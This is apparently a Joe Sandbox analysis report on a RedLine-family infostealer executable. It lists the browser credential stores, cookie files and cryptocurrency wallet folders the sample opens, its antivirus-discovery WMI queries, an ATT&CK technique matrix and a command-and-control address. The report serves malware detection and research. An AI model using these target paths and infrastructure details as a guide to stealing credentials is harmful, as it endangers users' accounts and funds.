                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: VXB84UvyHp.exe, 00000000.00000002.1824035213.0000000006666000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: VXB84UvyHp.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.VXB84UvyHp.exe.ab0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1688057182.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: VXB84UvyHp.exe PID: 7296, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                      Source: Yara matchFile source: VXB84UvyHp.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.VXB84UvyHp.exe.ab0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1688057182.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: VXB84UvyHp.exe PID: 7296, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: VXB84UvyHp.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.VXB84UvyHp.exe.ab0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1688057182.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: VXB84UvyHp.exe PID: 7296, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      Process Injection
                      1
                      Masquerading
                      1
                      OS Credential Dumping
                      231
                      Security Software Discovery
                      Remote Services1
                      Archive Collected Data
                      11
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      LSASS Memory1
                      Process Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      1
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)241
                      Virtualization/Sandbox Evasion
                      Security Account Manager241
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive1
                      Ingress Tool Transfer
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Process Injection
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Timestomp
                      LSA Secrets113
                      System Information Discovery
                      SSHKeylogging14
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading
                      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      VXB84UvyHp.exe83%VirustotalBrowse
                      VXB84UvyHp.exe96%ReversingLabsByteCode-MSIL.Infostealer.RedLine
                      VXB84UvyHp.exe100%AviraHEUR/AGEN.1305500
                      VXB84UvyHp.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://192.144.32.84:16383/0%Avira URL Cloudsafe
                      192.144.32.84:163830%Avira URL Cloudsafe
                      http://192.144.32.84:163830%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.ip.sb.cdn.cloudflare.net
                      172.67.75.172
                      truefalse
                        high
                        api.ip.sb
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          http://192.144.32.84:16383/true
                          • Avira URL Cloud: safe
                          unknown
                          https://api.ip.sb/geoipfalse
                            high
                            192.144.32.84:16383true
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://ipinfo.io/ip%appdata%VXB84UvyHp.exefalse
                              high
                              https://duckduckgo.com/chrome_newtabVXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drfalse
                                high
                                https://duckduckgo.com/ac/?q=VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drfalse
                                  high
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoVXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousVXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://tempuri.org/Endpoint/CheckConnectResponseVXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.datacontract.org/2004/07/VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXVXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://tempuri.org/Endpoint/EnvironmentSettingsVXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://api.ip.sb/geoip%USERPEnvironmentROFILE%VXB84UvyHp.exefalse
                                                high
                                                https://api.ip.sbVXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/soap/envelope/VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drfalse
                                                      high
                                                      http://tempuri.org/VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://tempuri.org/Endpoint/CheckConnectVXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drfalse
                                                            high
                                                            https://www.ecosia.org/newtab/VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drfalse
                                                              high
                                                              http://tempuri.org/Endpoint/VerifyUpdateResponseVXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://tempuri.org/Endpoint/SetEnvironmentVXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://tempuri.org/Endpoint/SetEnvironmentResponseVXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://192.144.32.84:16383VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000003036000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://tempuri.org/Endpoint/GetUpdatesVXB84UvyHp.exe, 00000000.00000002.1813975297.0000000003036000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1813975297.000000000303A000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ac.ecosia.org/autocomplete?q=VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drfalse
                                                                        high
                                                                        https://api.ipify.orgcookies//settinString.RemovegVXB84UvyHp.exefalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressingVXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://tempuri.org/Endpoint/GetUpdatesResponseVXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchVXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drfalse
                                                                                high
                                                                                http://tempuri.org/Endpoint/EnvironmentSettingsResponseVXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://tempuri.org/Endpoint/VerifyUpdateVXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://tempuri.org/0VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameVXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/soap/actor/nextVXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            172.67.75.172
                                                                                            api.ip.sb.cdn.cloudflare.netUnited States
                                                                                            13335CLOUDFLARENETUSfalse
                                                                                            192.144.32.84
                                                                                            unknownGermany
                                                                                            206233MATTEOGBtrue
                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                            Analysis ID:1596524
                                                                                            Start date and time:2025-01-22 04:11:06 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 3m 41s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:5
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:VXB84UvyHp.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:4698A45D6F8DA200C396E56AF7B8D34F.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@2/43@1/2
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            • Number of executed functions: 31
                                                                                            • Number of non-executed functions: 2
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Stop behavior analysis, all processes terminated
                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                                                                            • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            TimeTypeDescription
                                                                                            22:12:07API Interceptor36x Sleep call for process: VXB84UvyHp.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            172.67.75.172http://www.fcc-movil.com/80th/enphem1sX2F0dG9ybmV5YXpAZmQub3JnGet hashmaliciousPhisherBrowse
                                                                                              https://bityl.co/Rdhj#MmpKcFFEVVI2TVllaWsyVHoxbTVjNVQ2OFJkV0I2UW53emdGdFlabWtLYlFDd3ZmMjIydmh0VVc3SEJnZUNkeG11THhoRWM4cS95OXhmejFJQXRJWlE9PQ__Get hashmaliciousPhisherBrowse
                                                                                                https://www.popisoft.comGet hashmaliciousUnknownBrowse
                                                                                                  3oYqGm39Lk.exeGet hashmaliciousAmadey, PrivateLoader, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                    3KuXQ4yrkM.exeGet hashmaliciousGlupteba, Mystic Stealer, RedLine, SmokeLoader, zgRATBrowse
                                                                                                      l5GCQ2fOuD.exeGet hashmaliciousDjvu, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, TofseeBrowse
                                                                                                        70141CDE965558529B1ADC82862D402149F21443F12F0.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                                                                                          N04MI8kf8z.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                                                                                            6b109e55911293b4e5098d3711849b85499a988385721.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                              file.exeGet hashmaliciousFabookie, ManusCrypt, Nitol, Nymaim, RHADAMANTHYS, RedLine, SocelarsBrowse
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                api.ip.sb.cdn.cloudflare.netchTJmCR9bS.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                • 104.26.12.31
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                CLOUDFLARENETUSPO1234.001.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 104.21.96.1
                                                                                                                using python exe.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 188.114.96.3
                                                                                                                using python exe.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.21.79.52
                                                                                                                Anal Glory 5 Brazzers 2024 XXX WEBDL 540p SP...msiGet hashmaliciousUnknownBrowse
                                                                                                                • 104.22.31.209
                                                                                                                using python exe.msiGet hashmaliciousUnknownBrowse
                                                                                                                • 188.114.96.3
                                                                                                                VIRTUAL X MENU.msiGet hashmaliciousUnknownBrowse
                                                                                                                • 188.114.96.3
                                                                                                                http://ink-01.d03c9e86w5d.eu.org/Get hashmaliciousUnknownBrowse
                                                                                                                • 188.114.96.3
                                                                                                                http://www.ledgerlive-safety.com/files/Get hashmaliciousUnknownBrowse
                                                                                                                • 188.114.96.3
                                                                                                                http://www.urls.fr/ozpRGm/Get hashmaliciousUnknownBrowse
                                                                                                                • 104.22.41.173
                                                                                                                https://1146d15.wcomhost.com/Get hashmaliciousUnknownBrowse
                                                                                                                • 104.22.41.173
                                                                                                                MATTEOGBtB114oiRY5.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                • 146.185.209.82
                                                                                                                uziTyAHxCX.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                • 146.185.209.82
                                                                                                                UpgzkaAmBp.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                • 146.185.209.82
                                                                                                                Buj4LG5Eu4.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                • 146.185.209.82
                                                                                                                TradingView.exeGet hashmaliciousRedLineBrowse
                                                                                                                • 91.243.59.21
                                                                                                                3.apkGet hashmaliciousTEABotBrowse
                                                                                                                • 91.243.34.26
                                                                                                                fEOqmNHQhu.exeGet hashmaliciousCerberBrowse
                                                                                                                • 31.184.234.34
                                                                                                                n2vBPxeTmB.exeGet hashmaliciousDCRat, RedLineBrowse
                                                                                                                • 91.243.32.178
                                                                                                                [Cracked By Grizzly] BLTools.exeGet hashmaliciousRedLineBrowse
                                                                                                                • 91.243.59.21
                                                                                                                4sEgS3BBbZ.exeGet hashmaliciousRedLineBrowse
                                                                                                                • 91.243.59.24
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                54328bd36c14bd82ddaa0c04b25ed9adPO1234.001.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 172.67.75.172
                                                                                                                Ref50102607UUU.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 172.67.75.172
                                                                                                                Payment Error.cmd.exeGet hashmaliciousReverseShell, Snake KeyloggerBrowse
                                                                                                                • 172.67.75.172
                                                                                                                IMG_50117302.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 172.67.75.172
                                                                                                                Remittance Copy.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 172.67.75.172
                                                                                                                Halkbank Ekstre.pdf.exeGet hashmaliciousReverseShell, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 172.67.75.172
                                                                                                                sz#U00e1mla kiegyenl#U00edt#U00e9se fizet#U00e9shez 2025. janu#U00e1r 20.xlsx.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 172.67.75.172
                                                                                                                New Order 22012025-pdf.com.exeGet hashmaliciousReverseShell, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 172.67.75.172
                                                                                                                details.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 172.67.75.172
                                                                                                                new purchase order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 172.67.75.172
                                                                                                                No context
